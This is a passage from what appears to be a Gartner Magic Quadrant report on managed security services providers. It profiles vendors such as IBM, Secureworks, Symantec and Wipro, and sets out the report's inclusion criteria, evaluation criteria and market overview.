HCL Technologies is a global IT services provider that offers a range of IT and security services aimed at buyers, primarily through broad-scope IT outsourcing engagements. HCL is headquartered in Noida, India (with regional headquarters in London and Sunnyvale, California). MSS is a part of HCL’s Cybersecurity and GRC services provided via six 24/7 MSS SOCs worldwide (four in India, and one each in Europe and the U.S.). MSS is delivered using commercially available SIEM technologies (IBM QRadar, Micro Focus ArcSight, RSA NetWitness and Splunk), chosen in consultation with the customer. SIEM solutions are leveraged for log collection and management, and real-time security event monitoring and analysis. HCL also offers dedicated managed SIEM options. The vendor provides managed EDR, with multiple technology options available to customers, in addition to threat hunting services. SecIntAl is HCL’s branding for its big-data-based security analytics and threat intelligence capability that underpins the analytics for its threat monitoring services.

HCL’s portal provides a single dashboard-oriented interface across all supported SIEM tools, vulnerability management, endpoint management and CMDB services. Dedicated views in the portal support both analysts and leader personas. HCL supports a variety of third-party security technologies. In addition to firewalls, IDPSs and secure web gateways (SWGs), it also supports a variety of solutions like EDR, CASB, network traffic analysis (NTA) and vulnerability management. Related services, like incident and breach response, are provided by select partners.

Organizations engaged in IT outsourcing and technology transformation projects, buyers looking for providers to use their preferred SIEM tool and broad-based support for security technologies, and existing HCL Technologies customers should consider HCL for MSSs.

STRENGTHS
  • MSS customers can leverage HCL’s support for security technologies across a wide range of markets for product procurement, implementation and management. HCL’s MSS delivery approach is customizable to customers’ requirements and existing security technology solutions.
  • HCL offers considerable flexibility for buyers with broad and complex security monitoring and management requirements across on-premises, SaaS, IaaS and PaaS environments.
  • Customers generally give HCL above-average marks across acquisition, implementation and overall services.
CAUTIONS
  • HCL Technologies’ portal is focused mainly on service visibility through predefined dashboards and reports. Search functionality has been enhanced in the last 12 months, but is limited to 30 days of online data by default.
  • Customers looking for a turnkey security event monitoring service leveraging a shared delivery platform (e.g., no preference for an SIEM solution or bringing their own SIEM tool) should confirm with the vendor which SIEM solution will be used for the service and whether it meets buyers’ requirements and supports existing technologies (security and IT log event sources).
  • HCL Technologies is rarely mentioned in Gartner client inquiries for discrete MSSs as most HCL customers procure MSSs in conjunction with other outsourcing initiatives.

IBM

IBM is headquartered in Armonk, New York, with MSS offices in the U.S. (Atlanta and Cambridge, Massachusetts); London; Brussels; and Hortolandia, Brazil. IBM offers a broad range of MSSs, security consulting and incident response, either as stand-alone offerings or as part of larger IT services and outsourcing engagements. MSSs are delivered from five 24/7 SOCs, called X-Force Command Centers: one in the U.S.; one in San Jose, Costa Rica; one in Hortolandia, Brazil; one in Tokyo and one in Wroclaw, Poland. IBM has three additional non-24/7 SOCs in India, Belgium and the U.S. IBM uses its QRadar SIEM solution to deliver unified monitoring across MSS, regardless of the location of the QRadar platform — shared multitenant, on-premises or as a service. There are four MSS tiers available, ranging from basic endpoint security to highly customized services. IBM’s advanced analytics and targeted attack detection capabilities for the network and hosts include support for customer-deployed products, IBM products (e.g., QRadar modules) and strategic partner solutions (e.g., Carbon Black for IBM Security’s Managed Detection and Response service). Threat intelligence and incident response services, as well as security consulting services, are available. Support for data residency requirements is available through European Commission Model Clauses contract language, local data centers in the customer’s region supported by EU staff out of the Poland SOC, and use of either on-premises QRadar SIEM or SIEM as a service hosted in-region within IBM Cloud.

Large enterprises with global service delivery requirements looking for flexible security event monitoring technology options, and those with strategic relationships with IBM, should consider IBM for MSSs.

STRENGTHS
  • IBM’s “QRadar Anywhere” approach provides flexible options for IBM QRadar SIEM customers that require managed SIEM options. Customers can migrate from the shared MSS platform to co-managed on-premises or QRadar on Cloud, or vice versa, as strategies evolve.
  • IBM MSS delivery is supported by a range of strong threat intelligence partners, including IBM’s X-Force Security Research, third-party commercial sources and data collected via the vendor’s in-house incident response services.
  • IBM has moderate visibility with Gartner clients considering MSSs. IBM’s visibility is growing for co-managed SIEM opportunities, however, rather than for discrete MSSs.
CAUTIONS
  • Customers report that the IBM sales process is uneven in its ability to engage with them effectively, citing, for example, a lack of responses to RFPs. Customers also report mixed satisfaction with IBM’s delivery of MSS services. Marks are lower than those of competitors in areas like overall service capabilities and overall experience.
  • Buyers should carefully analyze the technology approach recommended to deliver MSSs (e.g., shared or dedicated QRadar, whether on-premises or hosted) to ensure that the approach is compatible with their IT environments, architectures and requirements.
  • IBM offers a managed EDR service that is used for real-time threat detection and threat hunting purposes, but it has little visibility with buyers.

NTT

NTT brings together the MSS-specific resources and delivery platforms of NTT Com Security, Solutionary, Dimension Data, NTT Communications, NTT DATA and technology from the NTT Innovation Institute. NTT Security has been established as the specialized security company of the NTT Group. NTT is headquartered in Tokyo, with regional headquarters for North America, Europe and the Asia/Pacific region. NTT offers a broad range of security professional services and integration and incident response services. NTT Security has 17 24/7 MSS SOCs globally: six in the Asia/Pacific region, five in Europe and six in North America. In 2017, NTT progressed toward integrating its three separate platforms used for delivering MSS. Its new operating model is similar in nature to a channel-based approach in that NTT Security doesn’t directly sell services, instead relying on its group companies, which have varying levels of coverage and support in the different geographies. NTT is actively migrating North American and Japan customers to its new Global Managed Security Services Platform (GMSSP), while EMEA and remaining Asia/Pacific region customers continue to use the existing WideAngle and ArcSight ESM-based platforms. NTT Security MSSs are sold via the NTT Group companies of Dimension Data, NTT Communications and NTT DATA.

Customers of NTT operating companies, and enterprises seeking a large global provider, should consider NTT for MSSs.

STRENGTHS
  • NTT can bundle MSS with a wide range of security service offerings and delivery options, including broader telecommunications and IT infrastructure service offerings.
  • NTT has the ability to serve a wide range of industries/verticals across geographies due to the NTT Group companies’ global presence.
  • The new NTT Security portal (GMSSP) has a good range of roles available, with some customization and self-service capabilities available to customers. Integrations with NTT Group companies and customers to the GMSSP are supported via a RESTful API.
  • NTT has moderate visibility with Gartner clients looking for discrete MSSs.
CAUTIONS
  • NTT Security has moved its security sales team to the NTT Group companies while the delivery of the service happens through NTT Security, which is a separate group. This may create misalignment between the sales/marketing and product management/engineering functions, and may create confusion for customers that wish to purchase MSS from NTT Security.
  • Many of NTT’s EMEA and Asia/Pacific region customers are still on their older portals and delivery platforms. MSS customers should get clarity from their NTT Group company provider regarding plans to migrate to the new portal without affecting service continuity and while maintaining service features.
  • While there is a managed EDR offering with Carbon Black, FireEye and CounterTack, NTT is behind some of its competitors in introducing advanced threat-detection-oriented services such as threat hunting and network monitoring.

Orange Business Services

Orange Business Services (Orange), headquartered in Paris and with regional offices in a wide variety of locations across the Asia/Pacific region, North America and Europe, offers a broad range of telecommunications and cloud-based IT infrastructure services, security consulting services, and MSSs. Orange’s MSSs are delivered using commercial and proprietary technologies for log management, event correlation and advanced threat detection, as well as some wider integrations with open-source big data technologies. Security Event Intelligence is the service offering for 24/7 threat detection and response. Threat intelligence is centered around malicious IP addresses, URLs and domain names curated by Orange and collected from a large number of public and private feeds and sources, discoveries made on the Orange Internet backbone, and intelligence from Orange’s in-house CERT team. Services are delivered from seven SOCs (three located in Europe, one in India, one in Malaysia, and one each in Mauritius and Egypt). All SOCs are 24/7 except for the European and Malaysia SOCs, which use a “follow the sun” model. Data residency requirements are addressed on a case-by-case basis, with a majority of non-European clients being serviced from the India and Egypt SOCs.

Orange’s network and infrastructure service customers and multinational organizations, especially those with a European and Asia/Pacific business focus, seeking network-security-focused MSSs should consider Orange Business Services.

STRENGTHS
  • Orange is experienced in integrating and operating global networking and IT services with MSS.
  • Security device management services are a strong focus for the vendor.
  • Orange has a good understanding of regulatory frameworks around data privacy and residency, and caters to many different standards, especially in the European region, with a focus on France.
  • Orange customers give above-average marks for vendor and service capability satisfaction.
CAUTIONS
  • The Orange MSS portal has less self-service functionality and usability than many of its competitors, and lags behind in granular user access and control, and reporting abilities. Orange has added enhanced portal functionality over the past 12 months, focusing on search and visualization capabilities.
  • Orange has less mature capabilities in providing advanced attack analytics as part of its MSS, with a focus on sandboxing and malware analysis rather than network or endpoint-based detection approaches.
  • Orange has limited market visibility with Gartner clients for discrete MSSs.

Secureworks

Secureworks offers a range of MSSs and other security-specific services to customers globally. Corporate headquarters are located in Atlanta, with offices in London, Edinburgh, Sydney and Tokyo. Services are delivered from three 24/7 SOCs in the U.S. (Atlanta; Chicago; and Providence, Rhode Island); one 24/7 SOC in Edinburgh, Scotland; and one 24/7 SOC in Kawasaki, Japan. The SOCs are supported by a center of excellence in Romania that is focused on customer device management and new service innovation. MSS delivery is through Secureworks’ proprietary Counter Threat Appliance (CTA) and Counter Threat Platform (CTP), which leverages a shared big data platform and advanced analytics capabilities. Customer access to services is via the Secureworks Client Portal. A range of commercial log sources from customer-deployed technologies are supported, in addition to leveraging commercial and proprietary tools for managed network and host-based threat monitoring. Host and network-based advanced threat detection are provided through Secureworks’ Advanced Endpoint Threat Detection (AETD) service (via its proprietary Red Cloak agent or Carbon Black) and its Advanced Malware Protection and Detection (AMPD; in partnership with Lastline) service. The Secureworks Counter Threat Unit research team provides threat research and threat intelligence, malware analysis, and analytics support to the provider’s SOCs. Additional services, such as vulnerability scanning (both customer- or Secureworks-managed) and advanced threat intelligence services are also available to buyers.

Midsize, enterprise and government organizations seeking an established MSS that leverages a consistent, shared delivery approach with a global presence, and a security-focused set of offerings, should consider Secureworks.

STRENGTHS
  • Advanced threat detection services are available for endpoint, whether leveraging the proprietary Red Cloak agent or Carbon Black, via the AETD service, which includes the ability to isolate hosts (either by the customer or by Secureworks’ SOC). Customers leveraging Secureworks iSensor in IPS mode, or via Secureworks managed firewalls, can self-initiate blocking for threats detected by the SOC.
  • Native support for IaaS monitoring in AWS and Azure is available, and includes capabilities for network and web app vulnerability management, which supports buyers requiring visibility and security monitoring in public cloud environments.
  • Secureworks offers an incident response retainer that is popular with buyers, which provides proactive as well as remote and on-site reactive response services.
  • Secureworks is highly visible with Gartner clients, and is frequently included in competitive MSS deals by North America-based midsize and enterprise buyers. It also has good visibility with U.K. buyers.
  • Gartner customers give positive feedback for Secureworks’ MSS offerings.
CAUTIONS
  • Secureworks lacks visibility with buyers in continental Europe and the Asia/Pacific region for MSSs.
  • Customers requiring raw event log retention (e.g., for compliance reporting and incident investigation purposes beyond 90 days) can opt for Secureworks’ on-premises log management offering (LogVault).
  • Monitoring for Office 365 and Salesforce is supported, but support for other popular SaaS solutions like Box, Dropbox and Workday is not yet available. There is no CASB option available.
  • Basic response services are available to AETD and device management customers, but other response services like forensics support, including malware analysis and threat hunting, require adding premium services.

Symantec

Symantec is headquartered in Mountain View, California, and has six SOCs: one each in the U.S., the U.K. and Japan, and three in the Asia/Pacific region (India, Australia and Singapore). The SOCs operate on a follow-the-sun model to provide 24/7 support. Customers are assigned to a primary SOC in their region along with a global team of analysts aligned to their specific industry vertical. Symantec’s Cyber Security Services offerings include security monitoring and management, including hosted log retention, security intelligence, incident response services and security skills development services. Symantec has a broad portfolio of security technology solutions. Recent acquisitions include Outlier Security (EDR), Skycure (mobile device protection), and Fireglass (isolation technology). Symantec’s MSS SOC technology platform is based on self-developed technology. Customer event and log data are analyzed by Symantec’s global SOCs and retained in the North American data center. Symantec meets data residency requirements through contractual arrangements and the EU Standard Model Clause. Symantec MSS supports advanced threat detection via integrations with its own solutions as well as third-party products for network monitoring and forensics capabilities, and for payload analysis. MSS monitoring of EDR and forensics tools is offered for Symantec and third-party products. Incident and breach response services are available on retainer or on an ad hoc basis to buyers looking for a single provider for MSSs and response services. Monitoring capabilities are available for popular SaaS, IaaS and public cloud services. Pricing for MSS is offered in two models: based on a per-device/event source cost or on an enterprisewide license that provides unlimited monitoring up to a set limit of event sources (aka nodes).

Enterprises seeking an established MSSP with a global presence should consider Symantec.

STRENGTHS
  • Symantec has a well-established threat intelligence capability via its DeepSight services.
  • Symantec’s MSS portal offers granular role definitions and strong support for tracking and managing incident workflow.
  • The enterprisewide pricing model offers larger customers flexibility in bringing security event sources into scope for monitoring, and avoids change orders to add event sources beneath the agreed-on total for monitoring.
  • MSS customers indicate that Symantec is effective in detecting and helping to respond to advanced threats and targeted attacks.
  • Symantec has good visibility for MSS among Gartner customers.
CAUTIONS
  • Symantec primarily focuses on security monitoring now and directly offers limited device management services, primarily for IDPS, and not for other security controls. Prospective customers seeking device management services in addition to monitoring must anticipate working with Symantec partners.
  • Current integrations with vulnerability scanning products do not enable MSS customers to schedule or run scans via Symantec’s MSS portal. Customers can view scan results in the portal.
  • Symantec’s MDR-type advanced threat detection offerings, one network-based and the other host-based, are in the limited pilot/early adopter phase. Buyers interested in using one of these services will need to validate when they are available in their geography.

Trustwave

Trustwave, a stand-alone business within Singtel Group Enterprise, is based in Chicago, with regional headquarters in London, Sao Paulo and Sydney. Trustwave has several partnerships with regional telecommunications and service providers (e.g., Rogers Communications in Canada, Optus in Australia, Globe Telecom in the Philippines and TIS in Japan) around the globe to provide MSSs to those partners’ customer bases. Trustwave has nine 24/7 SOCs around the globe — three in North America, two in Europe (Warsaw and London), and four in the Asia/Pacific region (Manila, Philippines; Singapore; Sydney; and Tokyo). In the case of its telecom partners, the 24/7 SOCs are operated by Trustwave, some of which are in colocated facilities with the partners. Trustwave has a large portfolio of security technologies — including SIEM, UTM, network access control, application security, WAF and anti-malware — and builds MSSs around those, as well as support for a variety of third-party security products. Threat intelligence and incident response services are provided in-house from the Trustwave SpiderLabs team. Trustwave offers a managed EDR service leveraging Carbon Black and CounterTack as partners. Midmarket and small enterprise organizations, especially those with PCI DSS compliance requirements, make up the majority of Trustwave customers; however, the vendor has increased its focus on large enterprise buyers.

Telecommunications customers that have formed strategic partnerships with Trustwave, as well as companies in the retail, hospitality, healthcare and banking vertical industries, should consider Trustwave for MSSs. Trustwave is a good option for customers that need both products and services from a single provider, as the vendor has several competitive security software- and hardware-based platforms.

STRENGTHS
  • Trustwave supports a large client base that spans small and midsize enterprises, as well as larger global organizations.
  • Trustwave has expanded its global footprint through strategic partnerships with communications service providers across the Asia/Pacific region and North America, implementing a customer- and vertical-centric delivery model across the newly established SOCs.
  • The vendor’s SpiderLabs security research, penetration testing and incident response teams provide threat intelligence that enhances the value of the MSSs, both through integration of the threat intelligence data directly into the monitoring workflow and through SpiderLabs analysts serving as a higher tier of skills for advanced triage.
  • Trustwave has moderate visibility with Gartner clients looking to purchase MSSs.
CAUTIONS
  • Trustwave is planning to release an update to its MSS portal. Customers coming on board should ensure that they are getting the new portal, and that they review the rollout plan and features for that portal to ensure that it does not affect their service continuity.
  • As Trustwave continues to add support for third-party security technologies, customers should validate when and to what extent the security products they have deployed will be fully supported by Trustwave MSSs.
  • Office 365 and Salesforce are supported directly via APIs; monitoring of other popular SaaS applications requires a CASB solution. Trustwave states that API integrations for additional SaaS vendors can be built, but these require sufficient lead time (up to 45 days) for development and implementation.

Verizon

Verizon is a telecommunications company headquartered in Basking Ridge, New Jersey, with regional offices in Reading, U.K., and Singapore, which offers MSSs and security consulting services. Verizon uses a global network of SOCs, with three SOCs in the U.S., four in the Asia/Pacific region (India and Australia), and two in Europe (Luxembourg and Germany). Verizon’s Unified Security Portal (USP) provides single portal access across all services and capabilities for customers. Verizon’s MSS platform includes log management capabilities allowing clients to search, index and store logs using technology based on Elasticsearch. A mix of proprietary and commercial technology, including Splunk, is used to analyze security data, which is ingested via Verizon’s proprietary Log Event Collector (LEC). Verizon uses regional SOCs and data retention to meet requirements for local data storage and analysis. Network Threat Advanced Analytics, which was added as a service in 2017, is available both to customers on the Verizon backbone network and through NetFlow analysis capabilities deployed at a customer’s site. Malware analysis and network and endpoint forensics are available to buyers. Remote and on-site support for incident and breach response is provided via the Threat Intel and Response Service.

Enterprises, including existing Verizon network customers, should consider Verizon if they require well-established global or region-specific MSSs.

STRENGTHS
  • Verizon’s investment in reporting, communications features and data visualization enables clients to fully manage, interpret and investigate their security incidents within Verizon’s Unified Security Portal.
  • Netskope and Cisco Cloudlock, two leading CASB solutions, are currently supported by Verizon. Buyers with SaaS monitoring requirements should confirm support for their preferred CASB vendor.
  • Verizon has moderate visibility with Gartner clients for MSSs.
CAUTIONS
  • Verizon’s pricing model, specifically for the MSS Analytics service, is based on the volume of log event and other data sent per day, measured in GB per day (management of security devices is still priced on a per-device basis). Buyers considering Verizon services should carefully analyze how much event and data volume they currently generate, and may generate over time, to properly scope the service costs.
  • Vulnerability management in Verizon’s Unified Security Portal lags behind many competing MSSPs. Buyers should validate how Verizon integrates and leverages the data from their preferred vulnerability management solution.
  • Verizon lags behind competitors in its managed EDR service offerings. Leading EPP vendors are supported, but EDR-specific technologies are not yet supported.

Wipro

Wipro provides a variety of MSSs, including security threat monitoring, infrastructure security operations and technology management, vulnerability management, incident response, identity and access management, and security consulting services. Wipro is headquartered in Bangalore, India, with offices in London, New York, New Jersey and elsewhere around the globe. MSSs are delivered from 14 24/7 SOCs, with eight in India (Bangalore, Pune, Chennai, Mysore, Bhubaneswar, Kochi, Noida and Gurgaon), two in Europe (Amsterdam and Meerbusch, Germany), and four in North America (Houston, Dallas, Phoenix and Edmonton, Canada). Wipro offers security event monitoring via its multitenant ServiceNXT platform, or Wipro can support customers that bring their own SIEM solution or require a specific, dedicated SIEM tool. Wipro currently supports six SIEM platforms. Customers access the Wipro MSSs through the Cyber Defense Center (CDC) portal, which provides a single landing page for accessing services used by customers. Wipro has a broad portfolio of technology partnerships available to buyers. Flexible options are also available to meet local or regional data residency requirements and regulations.

Buyers across Europe, the Americas and the Asia/Pacific region considering MSS as part of broader IT outsourcing activities, and enterprises seeking flexible options for managing a range of security controls, including SIEM tools, across a variety of IT environments, should consider Wipro.

STRENGTHS
  • Wipro makes newer technologies such as EDR, NTA and SOAR available to buyers and customers (as well as for use internally for service delivery where applicable). Wipro made additional strategic investments in 2017 (Demisto) to complement existing investments (Vectra and IntSights). Wipro plans to introduce services leveraging breach and attack simulation, as well as deception solutions, in the future.
  • Wipro has extensive partnerships across a range of security technologies that it can implement, and manage, and can use those tools on behalf of buyers to meet their specific or customized requirements.
  • Wipro’s MSS delivery approach is highly customizable to customers’ requirements and existing technology solutions.
  • Wipro customers report positive feedback for the vendor’s overall services and experience, but the feedback for the onboarding process is less positive.
CAUTIONS
  • Wipro is in the process of moving its primary delivery model to a shared, multitenant platform, instead of leveraging customer-specific SIEM tools as its default delivery model. That transition to the shared model is still a work in progress and delivery models still lean toward per-customer-specified SIEM solutions. Buyers preferring to leverage a shared delivery platform should evaluate the architecture and implementation to ensure that it is fit for their purposes and requirements.
  • Wipro has made many improvements to its CDC portal over the past 12 months toward usability and centralization of access to services, but it still lacks the features available in many competing MSS portals.
  • Wipro has low visibility with Gartner clients’ shortlists for stand-alone MSS deals.

Vendors Added and Dropped

We review and adjust our inclusion criteria for Magic Quadrants as markets change. As a result of these adjustments, the mix of vendors in any Magic Quadrant may change over time. A vendor’s appearance in a Magic Quadrant one year and not the next does not necessarily indicate that we have changed our opinion of that vendor. It may be a reflection of a change in the market and, therefore, changed evaluation criteria, or of a change of focus by that vendor.

Added

Capgemini, DXC Technology and Fujitsu were added.

Dropped

CSC and HPE Enterprise Services were dropped, as they merged under DXC Technology.

Inclusion and Exclusion Criteria

As a remote service, MSS can be delivered to and from any location with sufficient connectivity. MSSPs that have operations in one geographic region can support customers in other regions. Gartner sees a distinct preference among customers seeking MSSs to first consider MSSPs with a presence in their country or region (e.g., North America, Europe and the Asia/Pacific region). For global enterprises, that includes a presence in multiple regions where the enterprises operate, in order to provide more local support. Local presence enables the MSSP to keep some data in specific regions, to provide local business hours and access to advanced support, to meet staffing requirements (such as specific citizenship) and to offer local language support, among other capabilities. In addition, compliance with data residency and privacy regulations can in many cases be addressed with local operations centers.

This Magic Quadrant includes MSSPs that have met thresholds for scale (expressed as devices supported and customers) and presence (SOCs) in multiple regions, as well as a threshold for MSS revenue.

The criteria include a threshold for the number of firewalls or network-based IDPS devices under monitoring or management, and a threshold for the number of MSS customers — both distributed across multiple regions. We note that many providers, in addition to MSSs, offer other service delivery options (such as local staff augmentation) and related services, like building SOCs at a customer’s premises, which may be supported remotely by the MSSP’s SOC. However, these are not evaluated within this research. Also excluded from this analysis are service providers that offer MSSs only as a component of another service offering (such as bandwidth or hosting), and vendors that provide MSSs only for their own technologies, not for third-party technologies.

Inclusion Criteria

Vendors must:

  • Have services to remotely monitor and/or manage firewalls, UTM systems and IDPS devices from multiple vendors, delivered via discrete service offerings and shared-service delivery resources.
  • Have firewalls/IDPS devices under remote management or monitoring for external customers that meet a minimum threshold described below.
  • Have customers, as well as monitored firewalls and IDPS devices, across multiple geographies that meet a minimum threshold described below. The thresholds for customers and devices have increased from the prior Magic Quadrant to reflect market growth.
  • Have MSS revenue of $50 million or more in 2016. The threshold for revenue has increased from the prior Magic Quadrant.
  • Have a SOC presence in multiple geographic regions.
  • Have reference accounts that are relevant to Gartner clients in the appropriate geographic regions.
  • Be service providers that Gartner determines to be significant vendors in the market because of their market presence or service innovation.

Inclusion thresholds for firewalls/IDPS devices under MSSs are 389 in the Asia/Pacific region, 2,473 in Europe, 3,709 in North America and 45 in the rest of the world (ROW). MSSPs must meet the thresholds in one of the following combinations:

  • Asia/Pacific and Europe
  • North America and the ROW
  • Asia/Pacific and North America
  • Europe and North America

Inclusion thresholds for MSS clients are 75 in the Asia/Pacific region, 118 in Europe, 355 in North America and 19 in the ROW. MSSPs must meet the thresholds in one of the following combinations:

  • Asia/Pacific and Europe
  • North America and the ROW
  • Asia/Pacific and North America
  • Europe and North America

Exclusion Criteria

Vendors that have:

  • Service offerings that are available only to end users that buy the provider’s other, non-MSS services
  • Services that monitor or manage only the service provider’s own technology
  • Services delivered by service provider resources dedicated to a single customer
  • Services that fail to meet the inclusion criteria

Evaluation Criteria

Ability to Execute

Product/Service refers to the service capabilities in areas such as information and log management; security event management; threat detection, monitoring and alerting; incident management and response; workflow; reporting; and service levels.

Overall Viability (Business Unit, Financial, Strategy, Organization) includes an assessment of the organization’s overall financial health, as well as the financial and practical success of the business unit. It also includes the likelihood that the organization will continue to offer and invest in the service, as well as the service’s position in the current portfolio.

Sales Execution/Pricing evaluates the service provider’s success in the MSSP market and its capabilities in presales activities. This also includes MSS revenue, pricing and the overall effectiveness of the sales channel. The level of interest from Gartner clients is also considered.

Market Responsiveness/Record evaluates the match of the MSS offering to the functional requirements stated by buyers at time of acquisition. It also evaluates the MSSP’s track record in delivering new functions when the market needs them.

Marketing Execution is an evaluation of the service provider’s ability to effectively communicate the value and competitive differentiation of its MSS offering to its target buyer.

Customer Experience evaluates the service delivery to customers. The evaluation includes ease of deployment, the quality and effectiveness of monitoring and alerting, and reporting and problem resolution. This criterion is assessed by surveys of vendor-provided reference customers and Gartner’s Peer Insights solution, as well as by feedback from Gartner clients that are using an MSSP’s services or have completed competitive evaluations of the MSSP’s offerings.

Operations covers the MSSP’s service delivery resources, such as infrastructure, staffing and operations reviews, or certifications.

Table 1.   Ability to Execute Evaluation Criteria

Evaluation Criteria             Weighting
Product or Service              High
Overall Viability               Medium
Sales Execution/Pricing         Medium
Market Responsiveness/Record    High
Marketing Execution             Medium
Customer Experience             High
Operations                      Medium

Source: Gartner (February 2018)

Completeness of Vision

Market Understanding involves the MSSP’s ability to understand buyers’ needs and to translate them into services. MSSPs that show the highest degree of market understanding are adapting to customer requirements for specific functional areas and service delivery options. MSSPs with market-leading vision are investing in expertise and technology to monitor and analyze the external threat environment to better understand the sources, motives, targets and methods of attackers.

They are using that insight to improve the effectiveness of their MSS. They are also developing and introducing services that support large-scale data collection; advanced analytics, including statistical and behavioral functions; and monitoring of new data sources, such as endpoint, network and user to include in analysis. The goal of these capabilities is to more effectively find and respond to attacks, both broad-based and advanced targeted-type attacks.

Marketing Strategy evaluates clear, differentiated messaging consistently communicated internally, and externalized through social media, advertising, customer programs and positioning statements, and is tailored to the specific client drivers and market conditions in the MSS market.

Sales Strategy evaluates the strategy for selling that uses the appropriate networks, including direct and indirect sales, marketing, service, and communication, as well as partners that extend the scope and depth of market reach, expertise, technologies, services and their customer base.

Offering (Product) Strategy evaluates the provider’s approach to product development and delivery that emphasizes functionality and delivery options as they map to current and emerging requirements for MSSs. Development plans are also evaluated.

Vertical/Industry Strategy evaluates the strategy to direct resources (sales, product and development), skills and products to meet the specific needs of individual market segments, including verticals.

Innovation refers to the service provider’s strategy and ability to develop new MSS capabilities and delivery models to uniquely meet critical customer requirements. Examples include the capabilities described in Market Understanding.

Geographic Strategy addresses the vendor’s strategy to direct resources, skills and offerings to meet the specific needs of geographies outside the “home” or native geography, either directly or through partners, channels and subsidiaries, as appropriate for that geography and market.

Table 2.   Completeness of Vision Evaluation Criteria

Evaluation Criteria             Weighting
Market Understanding            High
Marketing Strategy              Medium
Sales Strategy                  Medium
Offering (Product) Strategy     High
Business Model                  Not Rated
Vertical/Industry Strategy      Medium
Innovation                      High
Geographic Strategy             Medium

Source: Gartner (February 2018)

Quadrant Descriptions

Leaders

Each of the service providers in the Leaders quadrant has significant mind share among organizations looking to buy MSSs as a discrete offering. These providers typically receive positive reports on service and performance from Gartner clients. MSSPs in the Leaders quadrant are typically appropriate options for enterprises requiring comprehensive portal-based access for interfacing with the service (e.g., responding to alerts, incident management, workflow, reporting, asset and access management, and managing other procured services, like vulnerability management) along with interaction with the MSSP for analyst expertise and advice.

Challengers

In the Challengers quadrant, Gartner customers are more likely to encounter MSSs that are offered as components of an IT or network service provider’s (NSP’s) other telecommunications, outsourcing or consulting services. Although MSS is not the leading service offering for this type of vendor, these providers tend to have a strong Ability to Execute, and they are attractive to buyers for whom procuring services from a single provider aligns with the organization’s IT strategy.

Visionaries

Companies in the Visionaries quadrant have demonstrated the ability to turn a strong focus on managed security into high-quality service offerings for the MSS market. These service providers are often strong contenders for enterprises that require access to and support for “cutting edge” technology, flexible service delivery options and strong customer service. MSSPs in the Visionaries quadrant have less market coverage and fewer resources or service options compared with vendors in the Leaders quadrant.

Niche Players

Niche Players are characterized by service offerings that are available primarily in specific market segments, or primarily as part of other service offerings. These service providers often tailor MSS offerings to specific requirements of the markets they serve. This quadrant is also characterized by providers that are newer, or have expanded beyond local and regional markets, to the global MSS market, and are maturing their delivery capabilities and offerings.

Context

Prospective MSS buyers with threat management use cases should highly weight MSSPs’ threat research, security intelligence and threat detection capabilities.

Prospective MSS users should require a proof of concept (POC), or a demonstration of MSS offerings, to validate ease of use, effectiveness and value. Current MSS customers should leverage POCs for new offerings from their existing MSSP before purchasing.

Current and prospective MSS users should validate MSSPs’ services to address advanced attacks via network behavior, network forensics, payload analysis, endpoint behavior and endpoint forensics, or consider MDR providers that specialize in such attack detection capabilities.

Global coverage matters to global enterprises. The MSS market includes a wide range of providers available only in a single region or country. If your organization is not global and wants good local support and presence, then carefully evaluate a global MSSP’s ability to “look local.”

Market Overview

The MSS market is a mature one, offering buyers a variety of options from a diverse set of providers that generally align to a core focus. MSS is provided by pure-play security providers, IT system integrators and outsourcers, and network services providers. Buyers leverage MSSPs to address requirements that include 24/7 monitoring and threat detection, security technology management, and meeting a variety of compliance requirements. The preferred approach is to leverage a shared-service model where resources and support are remotely delivered by the provider. These may be complemented by related drivers, such as access to deeper or broader security expertise than is available in-house given the industry concern about the lack of available security resources and expertise, and the ability to retain those resources, or the need to redirect existing internal resources to other higher-value security functions inside the organization. Gartner clients interested in MSSs are increasingly looking for providers with effective threat detection capabilities that can detect both broad-based as well as advanced threats, and offer incident response services that may extend all the way through to the containment and remediation of a threat, either remotely or through physical on-site support.

This Magic Quadrant reflects the requirements of customers with service needs in multiple geographic regions. MSSPs included in the evaluation meet the minimum thresholds for MSS delivery in two or more regions via in-region SOCs. MSSPs with a multiregional presence typically have a sufficient understanding of region-specific customer requirements, as well as sufficient service delivery capabilities that can scale to support global service delivery. Customers with a mix of global delivery requirements and local regulatory requirements related to, for example, data privacy, may require customized services.

MSSPs that do not meet the criteria for inclusion in this Magic Quadrant may still deliver high-quality services within a continental or geographic region or regions. When considering MSSs, Gartner customers should develop evaluation criteria that meet their specific requirements, and take geography (language, local resources, etc.) into account, where applicable.

Market trends, which are discussed in more detail below, include:

  • Moving beyond monitoring of only network-based security technologies, particularly the network perimeter, with increasing focus on the endpoint (e.g., managed EDR services)
  • Increasing movement toward more customized outcomes for buyers
  • Buyer demand for capabilities to monitor popular SaaS applications and public cloud service providers (IaaS)

The MSS market is growing at a healthy double-digit rate: in 2016, the market grew 10% to reach $9.4 billion in revenue (see “Market Share Analysis: Managed Security Services, Worldwide, 2016”), and Gartner expects this growth rate to be in the 15% to 17% range for 2017. The MSS market constitutes approximately 60% of the overall security outsourcing market, which will generate $18.7 billion in revenue in 2017, growing at a CAGR of 11% through 2021. It is important to view MSS in the context of broader security outsourcing, because large enterprises are increasingly looking for hybrid engagements that include a mix of shared and dedicated service delivery components.

Demand for MSSs, from enterprises and midsize organizations, is driven primarily by a variety of factors:

  • Security staffing challenges and budget shortages: Gartner sees organizations of all sizes and geographies continuing to be challenged to attract and afford the appropriate security and risk management staff (see “Adapt Your Traditional Staffing Practices for Cybersecurity” ). Also, in an increasingly hostile external threat environment (see “How to Respond to the 2018 Threat Landscape” ), Gartner security and risk management leaders continue to report a lack of sufficient funding and increasing budget pressures that affect their security monitoring and operations capabilities.
  • Midsize enterprise adoption of detection and response capabilities: Midsize organizations are embracing detection and response capabilities to complement their investments in preventive security controls. These organizations are also impacted by the increasing scarcity (or affordability) of security operations talent. These organizations are looking for MSSPs to act as extensions of their security staff, instead of adding security head count. MSSPs can provide these services on a 24/7 basis, allowing customers to devote their often scarce internal security resources to higher-value activities.
